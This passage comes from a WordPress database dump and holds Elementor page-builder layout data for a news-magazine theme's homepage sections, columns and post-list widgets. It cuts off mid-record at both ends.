Type\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1327,464,'_elementor_version','0.4'),(1328,464,'_elementor_css','a:3:{s:4:\"time\";i:1508911735;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1330,465,'_elementor_edit_mode','builder'),(1331,465,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsiv